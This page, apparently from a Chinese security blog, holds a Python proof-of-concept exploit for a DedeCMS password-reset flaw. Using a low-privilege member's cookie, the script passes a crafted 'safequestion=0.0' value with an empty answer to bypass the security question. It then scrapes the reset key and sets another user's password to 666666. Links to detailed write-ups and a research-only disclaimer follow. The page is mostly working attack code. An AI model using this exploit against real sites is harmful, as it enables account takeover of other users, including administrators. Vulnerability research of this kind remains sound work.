poc
# coding=utf-8 import re import requests from bs4 import BeautifulSoup if __name__ == "__main__": host = 'http://127.0.0.1/dedecms/' cookie = "PHPSESSID=hi7jm3fncr0q79du7tvu3bm406; DedeUserID=8; DedeUserID__ckMd5=7903ea0790a3690a; DedeLoginTime=1515641375; DedeLoginTime__ckMd5=0a847f5adbfcbbd4" # 注册账号的cookie num = 2 # 要修改密码的id headers = {'Cookie': cookie} rs = requests.get(host + '/member/index.php', headers=headers) if '/member/myfriend.php' in rs.text and '/member/pm.php' in rs.text: print '账号登陆成功' else: exit('账号登陆失败!') payload_url1 = "{host}/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id={num}".format( host=host, num=num) rs = requests.get(payload_url1, headers=headers) if '对不起,请10分钟后再重新申请'.decode('utf-8') in rs.text: exit('对不起,请10分钟后再重新申请').decode('utf-8') searchObj = re.search(r'<a href=/'(.*?)/'>', rs.text, re.M | re.I) payload_url2 = searchObj.group(1) payload_url2 = payload_url2.replace('amp;', '') print 'Payload : ' + payload_url2 rs = requests.get(payload_url2, headers=headers) soup = BeautifulSoup(rs.text, "html.parser") userid = soup.find_all(attrs={"name": "userid"})[0]['value'] key = soup.find_all(attrs={"name": "key"})[0]['value'] data = {'dopost': 'getpasswd', 'setp': 2, 'id': num, 'userid': userid, 'key': key, 'pwd': 666666, 'pwdok': 666666} rs = requests.post(host + "/member/resetpassword.php", data=data, headers=headers) if '更改密码成功,请牢记新密码'.decode('utf-8') in rs.text: print '更改密码成功'.decode('utf-8') print '账号:'.decode('utf-8') + userid print '密码:'.decode('utf-8') + '666666' else: print '更改密码失败'.decode('utf-8')
详细利用过程
https://xianzhi.aliyun.com/forum/topic/1926
https://www.0dayhack.com/post-768.html
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论